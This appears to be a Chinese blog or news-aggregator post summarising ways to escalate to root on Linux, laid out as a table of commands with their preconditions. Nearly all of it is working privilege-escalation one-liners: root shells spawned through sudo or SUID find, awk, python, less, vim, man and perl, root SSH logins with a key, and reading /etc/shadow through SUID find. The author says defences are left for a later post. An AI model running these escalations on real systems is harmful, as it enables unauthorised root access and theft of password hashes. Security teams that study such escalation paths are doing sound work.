当前位置: 首页 > news >正文

Linux下提权root权限

news 2025/7/26 9:47:54

现在AI工具这么丰富,稍微搜一下就有一个差不多的总结输出。但是,可能还不够详细,或者给得太多~~~

今天时间关系,今天只总结了在Linux如何提权到root,并没有写如何进行防护。后面有时间,我再总结一下。

命令实操前提条件作用说明补充说明
susu拥有root口令切换到 root 用户(继承当前环境)
su -, -l, --login 拥有root口令切换到 root 用户(使用root环境变量)
sudosudo -s当前用户在 sudoers 列表,拥有bash等默认shell的可执行权限非登录式 root shell访问(保留原环境变量)
sudo bash当前用户在 sudoers 列表,拥有bash等默认shell的可执行权限非登录式 root shell访问(保留原环境变量)
sudo -i当前用户在 sudoers 列表,拥有bash等默认shell的可执行权限登录式 root shell访问(使用root环境变量)
sudo su当前用户在 sudoers 列表,拥有su命令的可执行权限切换到 root 用户(继承当前环境)
sudo su -当前用户在 sudoers 列表,拥有su命令的可执行权限切换到 root 用户(使用root环境变量)
sshssh root@localhost拥有root口令登录式 root shell访问(使用root环境变量)
ssh -i /path/to/root_key root@host拥有公钥文件登录式 root shell访问(使用root环境变量)
findsudo find . -exec /bin/sh \; -quit当前用户在 sudoers 列表,拥有find命令的可执行权限非登录式 root shell访问(保留原环境变量)
find . -exec /bin/sh \; -quitfind被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
仍然是普通用户权限		1、find确实会将root权限传递给给-exec下的命令
2、但是,shell命令可能并不吃这一套
find . -exec cat /etc/shadow \; -quitfind被授权SUID或者GUID查看/etc/shadow文件(成功)
awksudo awk 'BEGIN {system("/bin/sh")}'当前用户在 sudoers 列表,拥有awk命令的可执行权限非登录式 root shell访问(保留原环境变量)
awk 'BEGIN {system("/bin/sh")}'awk被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
python sudo python -c 'import os; os.setuid(0); os.system("/bin/sh")'当前用户在 sudoers 列表,拥有python命令的可执行权限非登录式 root shell访问(保留原环境变量)
python -c 'import os; os.setuid(0); os.system("/bin/sh")'python被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
less/moresudo less /etc/shadow → v → :!/bin/sh当前用户在 sudoers 列表,拥有less命令的可执行权限非登录式 root shell访问(保留原环境变量)
less /etc/shadow → v → :!/bin/shless被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
vim/visudo vi -c ':!/bin/bash'当前用户在 sudoers 列表,拥有vim/vi命令的可执行权限非登录式 root shell访问(保留原环境变量)
vi -c ':!/bin/bash'vim/vi被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
mansudo man passwd → !/bin/sh当前用户在 sudoers 列表,拥有man命令的可执行权限非登录式 root shell访问(保留原环境变量)
man passwd → !/bin/shman被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
perlsudo perl -e 'system("/bin/bash")'当前用户在 sudoers 列表,拥有perl命令的可执行权限非登录式 root shell访问(保留原环境变量)
perl -e 'system("/bin/bash")'perl被授权SUID或者GUID非登录式 root shell访问(保留原环境变量)
http://www.dtcms.com/a/298222.html

相关文章:

  • Asp.net core mvc中TagHelper的GetChildContentAsync和Content区别
  • GC8871刷式直流电机驱动器深度解析:3.6A驱动与内置电流检测技术
  • 虚拟地址-物理地址
  • leetcode110:判断平衡二叉树(两种思路对比)
  • 渗透高级-----测试复现(第三次作业)
  • 【GoLang#2】:基础入门(工具链 | 基础语法 | 内置函数)
  • 基于STM32汽车自动智能雨刷检测雨滴系统设计
  • 汽车免拆诊断案例 | 2010款奔驰E200 CGI车EPS OFF灯异常点亮
  • 数据类型选择:存储效率与查询性能的平衡
  • 【redis】缓存穿透、缓存击穿、缓存雪崩区别
  • Java学习第七十三部分——Redis
  • 前端面试问题
  • 安卓小说阅读软件推荐
  • 深入解析HBase如何保证强一致性:WAL日志与MVCC机制
  • [尚庭公寓]14-找房模块
  • 手写A2C(FrozenLake环境)
  • 直播美颜SDK动态贴纸模块开发指南:从人脸关键点识别到3D贴合
  • kiro的介绍和安装
  • 7.文件操作:让程序读写文件 [特殊字符]
  • CentOS 7.9 + GCC9 离线安装 IWYU(Include What You Use)
  • Linux库——库的制作和原理(1)_回顾动静态库、制作使用库
  • 【服务器与部署 26】配置管理实战:Ansible、Puppet自动化配置管理让运维效率提升10倍
  • 电磁兼容二:共模和差模问题
  • 【06】C#入门到精通——C# 多个 .cs文件项目 同一项目下添加多个 .cs文件
  • Spring Boot 整合 MyBatis 与 Druid 数据源全流程
  • 《整合Spring Cache:本地缓存、Redis与Caffeine对比实践》
  • 7.25总结
  • 详解Python标准库之内置函数
  • 20255年第四届创新杯(原钉钉杯)参考论文+标准答案发布
  • 融合与智能:AI 时代数据库的进化之路